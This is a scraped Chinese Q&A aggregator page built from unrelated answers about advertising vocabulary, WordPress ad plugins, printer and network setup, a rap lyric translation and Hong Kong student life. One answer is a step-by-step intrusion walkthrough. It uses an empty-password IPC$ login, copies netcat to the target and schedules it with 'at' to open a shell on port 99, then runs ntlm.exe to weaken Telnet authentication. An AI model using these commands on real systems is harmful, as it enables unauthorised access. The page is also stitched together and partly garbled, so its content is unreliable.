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2023-05-19 17:30:07
TAG: 是什么



















2023-01-04 00:55:323


2023-01-04 00:55:484


2023-01-04 00:56:012


一、 ad 简明英汉词典 [基本词义] ad [Ad] n. (1) 广告 (2) [域] Andorra , 安道尔 abbr. (3) [军] Air Defense, 防空 现代英汉综合大辞典 [基本词义] ad [Ad] n. (1) 广告 want ad 招聘广告 现代英汉词典 [基本词义] ad [Ad] n. (1) 广告 二、 advertisement 简明英汉词典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 做广告 现代英汉综合大辞典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 通知 (2) 宣传 a full page advertisement 整页的大广告 wide advertisement 广为宣传 A-helps to sell goods. 广告(能)帮助推销货物。 [特殊用法] classified advertisement (1) 分类广告 commercial advertisement (1) 商业广告 paragraph advertisement (1) 写成新闻性的广告 publishers" advertisement (1) 出版商广告 television advertisement (1) 电视广告 tombstone advertisement (1) 证券发行公告; 证券经销人名单 advertisement of insurer (1) 承保人广告 现代英汉词典 [基本词义] advertisement [Ed5v:tIsmEnt] n. (1) 广告(= ad) The wall was covered with advertisements. 墙上贴满了广告。 It has many advertisements and many different sections. 星期日报有很多广告和许多栏目。 They like advertisements which show women in office, planes, and cars. 妇女们喜欢那些表现妇女在办公室工作、乘飞机旅行、驾驶着汽车等情形的广告。 (2) 登广告 三、 advertising 简明英汉词典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告业, 广告 adj. (2) 广告的 现代英汉综合大辞典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告(业) [词性变化] advertising [5AdvEtaiziN] adj. (1) 广告的, 与广告有关的 an advertising career 广告事业 the advertising columns (报上的)广告栏 advertising agency[firm] 广告公司 =adman advertising rates 广告费, 广告价格 advertising man [特殊用法] bank advertising (1) 银行广告 billboard advertising (1) 展台广告 collective advertising (1) 联合广告 competitive advertising (1) 竞争性广告 concept advertising (1) 有新意思的广告 cooperative advertising (1) 工商业联合广告 electric(al)advertising (1) 灯光广告 group advertising (1) 集体广告 hand bill advertising (1) 传单, 广告, 招贴 informative advertising (1) 商品介绍广告 illuminated advertising (1) 灯光广告 institutional advertising (1) 建立永久声誉的广告 keyed advertising (1) 广告索引 local advertising (1) 区域性广告 magazine advertising (1) 杂志广告 media advertising (1) 报刊等宣传工具上的广告 national advertising (1) 全国性广告 network advertising (1) 网络性广告 outdoor advertising (1) 街头[室外]广告 point-of-purchase advertising (1) 零售商说明其经营业务的广告标志 price advertising (1) 价格广告 puffing advertising (1) 口头广告 radio advertising (1) 无线电广播广告 slide advertising (1) 幻灯广告 technical press advertising (1) 技术刊物上的广告 trade advertising (1) 商业性刊物上的广告 transit advertising (1) 公共交通工具上的广告 现代英汉词典 [基本词义] advertising [5AdvEtaIsIN] n. (1) 广告 advertising agency 广告公司 advertising agent 广告经纪人 advertising expense 广告费 And advertising is one of the biggest businesses in America. 广告是美国最大的行业之一。
2023-01-04 00:56:104


2023-01-04 00:56:233


楼上的 真强啊……-。-|||
2023-01-04 00:56:404


recent years, the research of advertisement English has made the very big progress, however, it is as if insufficient to understand its fuzziness in the former research, and it is also one of reasons to present the paper. This research is for the purpose of giving the certain enlightenment to the advertisement editor and the consumer,therefore it has the widespread practical significance. As the adman, we must be good at grasping the fuzzy criterion of the language, thus attracting general expense community"s attention to the greatest degree within the limited length and the limited time, increasing the advertisement power, displaying the best commercial function of advertisement language.for the populace who expended, understanding the fuzziness of the advertisement language could cause them understand the charm of the advertisement language so well that they can make the correct choice promptly at same time.
2023-01-04 00:56:564


安装打印机方法:1 开始--控制面板--添加打印机。2 点击下一步,(如果打印机在本机,选择此计算机连本地打印机,之后点下一步3、选择打印机插孔,一般的usb和ltp1,插口,正常你的这个是ltp插口的。,选择完毕点下一步)。4、点下一步,在出现一个对话框,在厂商那里找惠普,在型号那里找到对应型号。5、点击下一步,下一步,完成。6、插上打印机,通电,自动检测完成安装。
2023-01-04 00:57:091


2023-01-04 00:57:144


All in One Adsense and YPN:可以让用户非常方便的在Wordpress后台生成免费的Adsense广告和雅虎广告的管理插件, 包含多种配置选项, 不需要手动添加代码, 一切皆在Wordpress后台即可完成. 插件主页 AdServe - AdServe是一个Wordpress广告插件.你可以使用这个Wordpress插件设置各种Banner尺寸的广告,并且可以在后台实现展示和点击统计等.插件主页. Smart Ads - 这个Wordpress插件可以让你插入你的广告到文章中,而插入位置可以根据文章字数,文章日期或其它一些参数来进行设置.插件主页. Random / Rotating Ads - 这是一个Wordpress随机广告插件, 可以让你简单轻松的显示随机广告或轮播广告到任何你想放置的地方. Adman - Adman是一个Wordpress广告插件,可以实现把广告插入到指定的文章中间部分 插件主页 Post Layout - 这个插件可以让你不需要修改Wordpress模板的前提下, 轻松插入HTML, JavaScript 或 PHP代码到文章中, 这也就意味着你可以很方便的插入Adsense或其它广告代码到你的文章中. 插件主页. LinkShare RSS DealFeed - LinkShare RSS DealFeed是链接广告平台LinkShare专门为Wordpress用户推出的插件. 可以自动插入Linkshare的链接广告到欠的Wordpress博客和RSS Feed. 当然, 前提是你加了LinkShare. wordpress125 - 125*125广告已经成为博客上面的主流广告格式, 这个Wordpress插件就是用来让你更加方便的管理你博客中的125*125广告. .插件主页 AdSense Revenue Sharing 1.2 - 这个Wordpress的Adsense插件可以让你轻松插件入Adsense广告到你的博客中且能向你的朋友显示你的Adsense广告收益. 插件主页 wordpress Tag Ads - wordpress Tag Ads是一个比较特别的Wordpress广告插件. 它可以根据wordpress文章的Tag标签系统来显示不同的广告. 当然, 这并不是说能影响到Adsense广告, 产品购物类的广告会比较适合. 比如标签为Music, Movie之类的文章里面就可以设置成显示Ebay的DVD, CD购物广告, 以此类推. 如果你正好有这方面的广告投放, 那这是一个值得尝试的插件. Context Ad Wrapper - Context Ad Wrapper是一个Wordpress广告插件, 可以加强关键词广告的关联性, 避免显示不相关的广告. 目前据开发者测试支持的广告有Google Adsense, Amazon的文字内容链接广告和另外两个国外的广告平台. 插件主页 AdRotate - 一个非常简单的Wordpress随机广告插件. 插件主页 Wordpress-Banner - Wordpress Banner广告插件. AdSense Manager - Wordpress的AdSense广告管理插件, 可以让你方便的管理AdSense和其它广告平台的广告代码, 实现轻松的插入, 修改, 自动显示在指定的文章中等等. 插件主页 AskApache Firefox Adsense - 这个Wordpress广告插件用来向非Firefox用户显示Firefox的推荐广告. 这种有针对性的广告显示插件很棒. 不过, 现在, 已经用不上了. 插件主页 Adsense-Deluxe2 - 又一个Adsense广告管理的Wordpress插件. 支持单独的Wordpress程序和Wordpress MU. 插件主页 Accelerate your advertising - 每一个都希望自己的博客都能以最快的速度载入. 而广告代码对网页的载入速度有很多的影响, 这个Wordpress广告插件通过把广告显示排到最后来加速你的网页内容显示. MaxBlogPress Stripe Ad - 是一款可以置顶显示文字广告或者声明,告示等等的WordPress插件。可以自由添加多个文字广告来循环展示,设置标题和链接,同时可以设置权重来调整 不同广告的展示次数比例。能够设置是否浮动置顶显示,是否显示关闭按钮。同时可以设置颜色,字体,边框等等样式,而且可以设置不同的展示方式。对于想在 Blog上插播文字广告,声明等等还是很方便的。另,下载之前需要注册。via Author Adsense - 这是一个适合多个博客的Wordpress插件, 允许博客中的每个作者输入他们自己的广告代码, 然后显示在各自发表的文章中. 另外还有一个适合Wordpress MU的版本 - Author Adsense MU plugin 转自:洛克的彩色天空
2023-01-04 00:57:281


你好,很高兴为你解答:1、可能是未安装网卡驱动,可以在别处下载货拷贝一个驱动精灵,然后一键扫描安装网卡驱动即可。  2、如果网卡驱动正常,就打开【开始菜单】,点击【控制面板】,  3、然后点击【网络和Internet】,再点击【网络和共享中心】,  4、接着点击【更改适配器设置】,再用鼠标右击【无线网络连接】,选择【属性】打开,  5、在弹出的窗口中,选中【Internet协议版本4】,点击【属性】按钮,  6、最后选择自动获得IP地址,自动获得dns服务器地址即可。
2023-01-04 00:57:365


2023-01-04 00:58:216


2013年,国际创意大师Boker David来中国布道,在现场的听众要求讲一些创意的时候,Boker David直言不讳地说:中国的广告没有创意可言,中国的广告人只关注charge,而对idea毫不在意。在那次讲座的观众席里,坐着两位年轻人,听了Boker David的话之后,两位年轻人都在心里留下了一个信念,那就是:改变中国广告界。4年后,这两位年轻人都在中国广告界声名鹊起,其中一位叫做张咏调的年轻人凭借精准的群体观察,创办了广告行业专业刊物-《The Adman》,被称为中国广告界的“良心”;而另一位年轻人以先锋性的创意手法在好强林立的中国广告行业披荆斩棘,曾将多个默默无闻的品牌打造成传世品牌,而他也逐渐被人们称为“先锋策划大师”、“后现代文案大神”、“中国广告界百年一遇的天才”,他的的名字叫做范三石。即使夜空暗淡,也要成为星星的人!中国广告从未真正得到过世界的尊重,直到那两位年轻人的出现,而他们的出现也开创了中国广告新的时代,人们称之为“New Ad Day”!
2023-01-04 00:58:433


对酶进行分离纯化,然后测序(Adman测序法),条件允许的话就人工合成该蛋白基因,利用基因工程转移到合适载体。没条件的话就对那个可以产生酶蛋白的细胞进行基因测序,利用soughten blot 分子杂交技术确定指导该酶的基因。再然后,还是基因工程技术,内切酶切割基因,导入受体,蛋白表达测定!
2023-01-04 00:58:572


是不是Jonny B——《down low》? Check it out仔细听着  It"s eleven-thirty my hand is getting dirty  现在是11点30 我的手看不清了  Snatchin" up things that probably can"t be  waitin"抓住它 时间不会等你  Now this is a vision of a violent life  现在这是被生活扭曲的幻觉  Livin" by a guard and totem of the night 作为  夜晚的象征物守卫者活着  I"m slammin" doors 2-4-5 "n pullin" the keys  我关上245号门 拔出钥匙  Now these are the traged valuable luxuries to  me现在对我来说,这些都是有价值的奢侈  In the early dawn before you yawn  在你瞌睡之前你倒下了  I"ve been there swiped you and then I"m gone  我在哪里猛击了你 然后离开了  Now it"s six-o-clock my heart tic-tacs  现在是6点整 我的心脏滴嗒作响  A black sadden bag full of badass rocks  一个黯黑色的包里装满了该死的钻石  My identity has to bexposed  我的身份暴露无疑  Stealing from the spot that I chooly chosed  我以偷窃被指认 查理被关了起来  I lose and enfuse my choice to chose  我错失并毁掉了去选择的机会  Now I"m sick and I"m fallin" deeper in the mess  现在我很不爽深陷于困境之中  There"s no hope for me see  我看不到一丝希望  My path has been chosen I"m Johnny B  我的道路已经选择了 我是Johnny B  CHORUS  合唱:  Johnny B how much there is to see  JOHNNY B你还能看到多少希望  Just open your eyes and listen to me  睁开眼睛听我说  Straight ahead a green light turns to red  一道普通的绿光变成红色  Ooh why can"t you see ooh Johnny B  哦 为什么你不能看一下 哦 Johnny B  CHORUS  合唱.  the situation"s tight  在这棘手的状况中  You are billin" by the night  你成为了这夜晚的账单  Can"t choose between the wrongs and the rights  徘徊在对与错之间  I"m searchin" for the clues yo-what am I gotta  do  等等 我可以为寻找证据做些什么  I got the habit to take valuable things from  you  我习惯于从你哪里得到一些有价值的东西  Here I stand and I"m physically trapped by my  tent  我站在这里身体却被困在住处  Drifting漂流 northern breeze微风 triumphal凯旋  is this adman  微微的北风卷起的吹积物是这个广告人  A lonely path when I stand alone  当我站在无助的道路上  A round mothern flexion弯曲 曲折 bendin"使曲从  by my own  Here I lay down into certain deaths  我躺在这里进入无情的死亡  Two spirits calls grabs my very last breath  两个灵魂称夺取了我最后的呼吸  Sometimes I wishreveseness in my path  有时我希望在路上徘徊  A simple guest or a simple laugh  一个简单的待客和笑容  But I"m evil dirty and mean  但是我邪恶肮脏而且吝啬  Two pounds blood pasts through my bloodstream血  流  Frightened huh you should be  使我害怕 哈 你应该的  Who am I I"m Johnny B  我是谁 我是Johnny B  CHORUS.  Here we go here we gonow check the flow  (一起来)我们查看这流血  Here we go Johnny B is in control  Johnny B是凶手  REPEAT  It"s a sleepless night he"s callin" your name  这是个他呼唤你名字的难眠之夜  It"s a lonely ride I know how you saw him  这是个孤独的遁逃我知道你如何看到他的  Again and again he"s dressin" his dreams  一次又一次身披他的梦想  Yeah Johnny my friend it"s not what it seems  yeah Johnny我的朋友并不是你看到的那样  REPEAT CHORUS TWICE
2023-01-04 00:59:051


2023-01-04 00:59:113


Check it out仔细听着 (Listen carefully;Check it out意为:检查出来)It"s eleven-thirty my hand is getting dirty 现在是11点30 我的手看不清了(It is 11:30 and I can not see the hand of the;MY因用于句首或逗号之后啊!你这样翻译出来就是“这是1130年我的手越来越肮脏”这个意思了啊!) Snatchin" up things that probably can"t be waitin"抓住它 时间不会等你(Seize the time it will not wait for you;“wait”的过去分词应该不是“waitin”吧,按你这句翻译出来也不是这个意思啊!) Now this is a vision of a violent life现在这是被生活扭曲的幻觉 (This is now being distorted life of illusion;时间状语不能放在前面!你这句话翻译出来的意思也不对啊!变了味啊!变成“现在这是一个理想的暴力生活”这个意思了) Livin" by a guard and totem of the night 作为夜晚的象征物守卫者活着 (As a night guard symbols are alive;你那样翻译出来意思就变了啊!变成了“美好生活由一名后卫和图腾的夜晚”)I"m slammin" doors 2-4-5 "n pullin" the keys 我关上245号门 拔出钥匙 (正确的应该是I closed the door, pull out the 245 key; “pullin"”好像没见过啊! )Now these are the traged valuable luxuries to me现在对我来说,这些都是有价值的奢侈 (应该这样写“Now to me, these are valuable luxury”你这样改变了他原来的意思了,变成“现在,这些都是宝贵的奢侈品”价值这个词不用刻意的写出来啊)In the early dawn before you yawn 在你瞌睡之前你倒下了 (You sleepy before you fell;在这里不能用early的在....之前应该是before)I"ve been there swiped you and then I"m gone 我在哪里猛击了你 然后离开了(Where do I hit you and then left the;“I"ve been 不适合用于此句”句子的时态不对) Now it"s six-o-clock my heart tic-tacs 现在是6点整 我的心脏滴嗒作响 (It is 6:00 my whole heart ticking sound,直接用进行时即可表明现在一词“tic-tacs ”应用V+ing形式,表示现在进行时)A black sadden bag full of badass rocks 一个黯黑色的包里装满了该死的钻石 (A dark black bag filled with bloody diamonds;不必用过去分词,句子的时态错误)My identity has to bexposed 我的身份暴露无疑 (to 后面应加动词原形!)Stealing from the spot that I chooly chosed 我以偷窃被指认 查理被关了起来(I identified with theft and Charlie was up;句子的时态错误,主语应放在句首) I lose and enfuse my choice to chose 我错失并毁掉了去选择的机会 (I missed and lost the chance to choose;这里不适合用lose,因为lose意为为:遗失)Now I"m sick and I"m fallin" deeper in the mess 现在我很不爽深陷于困境之中 (Now I am out of sorts in deep trouble)There"s no hope for me see 我看不到一丝希望 (I do not see a ray of hope 主语前置)My path has been chosen I"m Johnny B 我的道路已经选择了 我是Johnny B (I have chosen the path that I am a Johnny B)CHORUS 合唱: (Chorus;后面小写)Johnny B how much there is to see JOHNNY B你还能看到多少希望 (JOHNNY B you can see how much hope)Just open your eyes and listen to me 睁开眼睛听我说 (Open your eyes and listen to me)Straight ahead a green light turns to red 一道普通的绿光变成红色 (An ordinary green light turns red)Ooh why can"t you see ooh Johnny B 哦 为什么你不能看一下 哦 Johnny B (Oh why can not you take a look at Oh Johnny B)CHORUS (Choir.)合唱. the situation"s tight 在这棘手的状况中 (In this difficult situation)You are billin" by the night 你成为了这夜晚的账单 (You become the night of the bill)Can"t choose between the wrongs and the rights 徘徊在对与错之间 I"m searchin" for the clues yo-what am I gotta do 等等 我可以为寻找证据做些什么 I got the habit to take valuable things from you 我习惯于从你哪里得到一些有价值的东西 Here I stand and I"m physically trapped by my tent 我站在这里身体却被困在住处 Drifting漂流 northern breeze微风 triumphal凯旋 is this adman 微微的北风卷起的吹积物是这个广告人 A lonely path when I stand alone 当我站在无助的道路上 A round mothern flexion弯曲 曲折 bendin"使曲从 by my own Here I lay down into certain deaths 我躺在这里进入无情的死亡 Two spirits calls grabs my very last breath 两个灵魂称夺取了我最后的呼吸 Sometimes I wish reveseness in my path 有时我希望在路上徘徊 A simple guest or a simple laugh 一个简单的待客和笑容 But I"m evil dirty and mean 但是我邪恶肮脏而且吝啬 Two pounds blood pasts through my bloodstream血流 Frightened huh you should be 使我害怕 哈 你应该的 Who am I I"m Johnny B 我是谁 我是Johnny B CHORUS. Here we go here we go now check the flow (一起来)我们查看这流血 Here we go Johnny B is in control Johnny B是凶手 REPEAT It"s a sleepless night he"s callin" your name 这是个他呼唤你名字的难眠之夜 It"s a lonely ride I know how you saw him 这是个孤独的遁逃我知道你如何看到他的 Again and again he"s dressin" his dreams 一次又一次身披他的梦想 Yeah Johnny my friend it"s not what it seems yeah Johnny我的朋友并不是你看到的那样 请找出语法错误。误解并纠正剩下的自己解决阿,我好累啊!就在这个网址里面|en|%E4%BD%A0%E6%88%90%E4%B8%BA%E4%BA%86%E8%BF%99%E5%A4%9C%E6%99%9A%E7%9A%84%E8%B4%A6%E5%8D%95%20
2023-01-04 00:59:221


2023-01-04 00:59:301


dramatics dragon adman
2023-01-04 00:59:354


2023-01-04 00:59:494

( )的广告

一、 ad 简明英汉词典 [基本词义] ad [Ad] n. (1) 广告 (2) [域] Andorra , 安道尔 abbr. (3) [军] Air Defense, 防空 现代英汉综合大辞典 [基本词义] ad [Ad] n. (1) 广告 want ad 招聘广告 现代英汉词典 [基本词义] ad [Ad] n. (1) 广告 二、 advertisement 简明英汉词典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 做广告 现代英汉综合大辞典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 通知 (2) 宣传 a full page advertisement 整页的大广告 wide advertisement 广为宣传 A-helps to sell goods. 广告(能)帮助推销货物。 [特殊用法] classified advertisement (1) 分类广告 commercial advertisement (1) 商业广告 paragraph advertisement (1) 写成新闻性的广告 publishers" advertisement (1) 出版商广告 television advertisement (1) 电视广告 tombstone advertisement (1) 证券发行公告; 证券经销人名单 advertisement of insurer (1) 承保人广告 现代英汉词典 [基本词义] advertisement [Ed5v:tIsmEnt] n. (1) 广告(= ad) The wall was covered with advertisements. 墙上贴满了广告。 It has many advertisements and many different sections. 星期日报有很多广告和许多栏目。 They like advertisements which show women in office, planes, and cars. 妇女们喜欢那些表现妇女在办公室工作、乘飞机旅行、驾驶着汽车等情形的广告。 (2) 登广告 三、 advertising 简明英汉词典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告业, 广告 adj. (2) 广告的 现代英汉综合大辞典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告(业) [词性变化] advertising [5AdvEtaiziN] adj. (1) 广告的, 与广告有关的 an advertising career 广告事业 the advertising columns (报上的)广告栏 advertising agency[firm] 广告公司 =adman advertising rates 广告费, 广告价格 advertising man [特殊用法] bank advertising (1) 银行广告 billboard advertising (1) 展台广告 collective advertising (1) 联合广告 competitive advertising (1) 竞争性广告 concept advertising (1) 有新意思的广告 cooperative advertising (1) 工商业联合广告 electric(al)advertising (1) 灯光广告 group advertising (1) 集体广告 hand bill advertising (1) 传单, 广告, 招贴 informative advertising (1) 商品介绍广告 illuminated advertising (1) 灯光广告 institutional advertising (1) 建立永久声誉的广告 keyed advertising (1) 广告索引 local advertising (1) 区域性广告 magazine advertising (1) 杂志广告 media advertising (1) 报刊等宣传工具上的广告 national advertising (1) 全国性广告 network advertising (1) 网络性广告 outdoor advertising (1) 街头[室外]广告 point-of-purchase advertising (1) 零售商说明其经营业务的广告标志 price advertising (1) 价格广告 puffing advertising (1) 口头广告 radio advertising (1) 无线电广播广告 slide advertising (1) 幻灯广告 technical press advertising (1) 技术刊物上的广告 trade advertising (1) 商业性刊物上的广告 transit advertising (1) 公共交通工具上的广告 现代英汉词典 [基本词义] advertising [5AdvEtaIsIN] n. (1) 广告 advertising agency 广告公司 advertising agent 广告经纪人 advertising expense 广告费 And advertising is one of the biggest businesses in America. 广告是美国最大的行业之一。
2023-01-04 01:00:461


postman—postmenpostman是属于特殊变化的,变化后的复数形式就是postmen其实就是把词尾的man(男人)变复数postmen 以-man 或者-woman 结尾的词都是这样,把man或woman 变复数就OK了。比如:seaman-seamen 海员,水手,精通海事的人,水兵Indiaman-Indiamen 过去用于与印度做生意的商船militiaman-militiamen 民兵cabman-cabmen 出租马车(或汽车)司机clubman-clubmen 俱乐部会员,交际家subman-submen (发育或理解力)极差的人,残暴的人adman-admen 广告员 suburbbadman-badmen 不法分子,偷牲口的人贼,受雇用的刺客headman-headmen 工头,监工,
2023-01-04 01:00:551

什么是 what"s the price break

就是打几折的意思price break[物价] 价格间断;大量订货折扣价(批发价)
2023-01-04 01:01:152


2023-01-04 01:01:389


2023-01-04 01:02:115


2023-01-04 01:02:344

求一首歌曲苏荷酒吧曾经播放过。有点老了 开始是笛声,之后就是一个男声说唱.说唱很棒...

感觉有点像nobody`s listening
2023-01-04 01:02:492


2023-01-04 01:02:5810


2023-01-04 01:03:483

月老咒语 为你揭晓你们之间的秘密?

月老咒语 :恋爱中的男女都是盲目的,在热恋中找到自我并不是件容易的事月老咒语为你提供更明晰的方向 爱情路上愿天下有情人都能享受到爱情的甜蜜。。。。哦对了:因为树上有相思鸟 所以才有了相思树
2023-01-04 01:04:001


开机按 del 里面找 boot 选项。
2023-01-04 01:04:073

here we go here we go every body get out。歌词里有这样的。

Bowling For Soup 的" Here We Go "歌词:Here We GoHere We GoEverybody"s Gonna get down let"s goHere we goHere we goEverybody"s gonna get down... let"s go!Back up man Your out of control (yeah)Your stressed out at full throttle (naw)Got so many problems I don"t need more (yeah)I"m with my friends we just wanna roll (naw)Right on through to the other sideRight on through, we will neva hideCause this is our town to rideAnd our Chevey will flyHere we goHere we goEverybody"s gonna get down, Let"s Go Here we goHere we goEverybody"s gonna get down.. let"s go!This is our plan understandWe"re blastin out music from a foreign landReggae and soul, punk, rock and roll, boom-box, radio. With all this music We don"t wanna drop (yeah)With all this musicWe"ll never stopAnd... nonstop night spotnonstop night spot, night spot not stopHere we goHere we goEverybody"s gonna get down, let"s goHere we goHere we goEverybody"s gonna get down.... let"s go!I"ve been to KingstonI"ve been to London, Osaka, NevadaAnd back to Brooklyn, I"ve been to Nevada,I"ve been to Stockholm, Sacremento, Fresno,I"ve been to Oakland.It"s not about flexinOr startin a fightIt"s not about who"s wrong or rightIt"s all about hanging with your friends tonightAt 7-11 everyday and nightHere we goHere we goEverybody"s gonna get down, let"s goHere we goHere we goEverybody"s gonna get down.... let"s go! Here we goHere we goEverybody"s gonna get down, let"s goHere we goHere we goEverybody"s gonna get down.... let"s go!
2023-01-04 01:04:222


显示正常。可能是你的浏览器原因如果是maxthon浏览器 删除相应目录下的所有icon文件。刷新页面就有了
2023-01-04 01:05:322


你要的是这个吧: SVA上广电液晶电视30秒电视广告: 平面广告: 补充: 视频暂时没有找到,那平面应该是你要的吧? 要想了解更多,请照参考资料.
2023-01-04 01:05:431


2023-01-04 01:05:503


2023-01-04 01:06:0515


本次范例需要的系统及程序情况如下: 操作系统:Windows 2000 对方操作系统:Windows 2000 程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP) 程序(二):Srv.exe 程序(三):Ntlm.exe 本机IP: 测试IP: 新程序介绍: Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。 Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。 关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。 扫描IPC$主机 假设,我们扫描了一台IPC$主机: 用户名:davis 密码:空 “//”后是注解。 Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-1998 Microsoft Corp. D:>net use$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~! 命令成功完成。 D:>copy srv.exe$ //先复制srv.exe上去,在流光的Tools目录就有。 已复制 1 个文件。 D:>net time //查查时间。 的当前时间是 2001/1/17 上午 10:48 命令成功完成。 D:>at \ 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。 新加了一项作业,其作业 ID = 1 D:>net time \ //再查查够时间没有?!噢~~够了~ 的当前时间是 2001/1/17 上午 10:51 命令成功完成。 D:>telnet 99 //我们telnet吧,注意端口是99哦~ Microsoft Windows 2000 [�セ 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:> //噢~~成功了! D:>copy ntlm.exe \$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录) 已复制 1 个文件。 Microsoft Windows 2000 [�セ 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:>ntlm //我们输入ntlm启动吧。 ntlm Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! //OK~:) C:> C:>net start telnet //然后直接用net start telnet启动telnet. net start telnet Telnet 狝叭タ�币笆 . Telnet 狝叭�竒币笆Θ�� //直觉告诉我成功了~!(没办法,这里是乱码) C:> C:> //这个窗口已经没用了,关了他吧! D:>telnet //我们在开一个DOS窗口,然后telnet上去。 NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: davis //输入用户名 password: //输入密码(密码是空的,所以不用输入)
2023-01-04 01:07:103


SummaryTV media regard as, offer information and important tool of amusement have important function among people"s life. With the aggravation of trade competition, the TV media will meet the keen competition situation when there are other fields more unavoidably. Provincial satellite TV station as file leader soldier of media, TV of Chinese, want, undertake important political task of press campaign on one hand, want, do well, manage, maximize audience rating of fighting for, bear province whom sets of advertisement create income heavy to let even more on the other hand. How make province grade break out defend apparent and numerous and similar, become, attract more audience brand media of eyeball, have already become the important subject that TV employee and advertiser have faced at present.On the basis of TV programme quality really up to the mark, TV media channel into CIS and correct to employ VI become TV set media absorb the audience gradually, and is pointing out the audience in order to keep it to particular TV station, the channel and column rating loyalty constantly, and then promote the important strategic choice of TV brand assets. This text defend case of regarding so as to representative Hunan as, pass the study on its VIS visual recognition system, shine upon China provincial Satellite TV current situation that VIS employ, probe into provincial provincial Satellite TV general route and layout strategy that VI employ, VI of Satellite TV.Keyword: Provincial Satellite TV, CI VI VI application, the packaging of channel
2023-01-04 01:07:252


按键盘上“~”键打开控制台,之后在控制台输入具体代码并按回车。1、来到87掩体的外围被一群小孩守着,你可以冷血清光他们。2、总之最后获得进入87掩体的门。3、这个恐怖的鬼地方,可是当年FEV生化病毒的实验室哩。4、这里会遇到全GAME最强同伴,号称42万滴血的FAWKES。5、他问你净水机的密码,如果你老实讲出来那就GAME OVER了
2023-01-04 01:07:432


学在香港香港高校中的老师不仅会在学术方面造诣颇深,还是活跃在行业尖端的人物。除了有很深的学术背景之外,更有着强大的社会工作经验,跟着这些大神老师们可以了解到所学专业里最高端的知识。不仅如此,还能接触到业内最高端的大咖人物,再加上香港高校的教师大都具有强大的社会资源,作为他们的学生总能获得各种background增强。听到这里,瞬间觉得有一种技能点被点亮了的快感。拥有一所=拥有N所顶尖大学香港高校在学习环境上花费的功夫相当深,整体环境相当舒适和人性化,可以在最大程度上满足学生的不同需求。以图书馆为例,香港各个高校的图书馆相互链接形成网络,学生可以跨院校进行图书借阅,确保了学习资源的最大化利用。更值得一提的是,在香港高校就读本科生可以一次性借阅30本图书,研究生可以一次性借阅50本,借阅时间半年,这样量大宽松的图书借阅模式为学生学习提供了良好的土壤,想不好好学习都不行...而且,图书馆还有24小时开放区域,专供学霸通宵…除了图书馆,在港学生还可以享受到各种与社会紧密相连的资源。各行各业的数据库都会对香港学生开放,例如广告行业的admango、经济领域的bloomberg等,还有以google为代表的各种线上资源。香港高校除了给学生提供了各种硬件上的学习资源之外,还会邀请在学术和实践领域知名的专家到校演讲,进一步开拓学生眼界。Life of HK,怎会单调在香港这片热闹的土地上,文娱活动可谓是异彩纷呈,各种文化节、演唱会、国内看不到的电影(咳咳),以及富有本地特色的赛马活动和传统节日,不管你是什么样的人,总能在香港找到自己喜欢的事物,对了,学长还着重提到了远近闻名的兰桂坊…除了各种文化活动可以填补课余空白之外,香港还是旅游爱好者的福地,据吴学长所讲,在香港的这些年,他就去了新加坡、日本、韩国、泰国…从以上事实可以得出,学长是土豪的结论!但是学长极力否认了这个事实,并举出了以下论点支持:作为香港学生,去到世界各地旅游都可以享受到不同的优惠政策,在签证方面就比在大陆容易很多。1.作为香港学生,基本就享受到了香港公民的权利2.香港学生在香港参加文娱活动可享受半价优惠总结一句话:去香港要会学,更要会玩…工作在香港相比于欧美来说,在香港读书的花费会更少,在港留学生在毕业后可以获得一年的逗留权,这一年期间可以在港求职,一旦找到工作并在香港工作超过7年饥渴获得“香港永久居民”称号! 成为人生赢家~当然,在香港找工作并没有想象中那么容易,机会与挑战总是并存的,像现在热门的银行业和保险业,想要跻身金融行业的难度还是相当之大的.除此之外,香港作为一个成熟的法制化健全社会,任何事情只要遵守规则就可以很顺利地得到解决,从而全身心地投入学习(娱乐)中去,没有各种烦事缠身的痛苦。港式生活吃的~还是咱社会主义好香港是有很多美食的,比如人均3000RMB的米其林三星,比如动辄上千的各种高档餐厅,然而这些并没有什么卵用…因为吃不起…所以每当想吃家乡风味的时候还是要北上去深圳,回归伟大社会主义的怀抱…高素质 讲文明 到哪儿都会被尊重香港人民包容高素质的大陆人。也就是说,只要你作为一个守规矩的高素质人,那么无论在香港的任何地方都是会受到尊重的,准备去香港的小伙伴们不用担心这个问题啦。
2023-01-04 01:08:2010


蓝巨星- -??????
2023-01-04 01:09:123


你的电脑配置太低 尤其是内存。。。
2023-01-04 01:09:267


2023-01-04 01:09:501


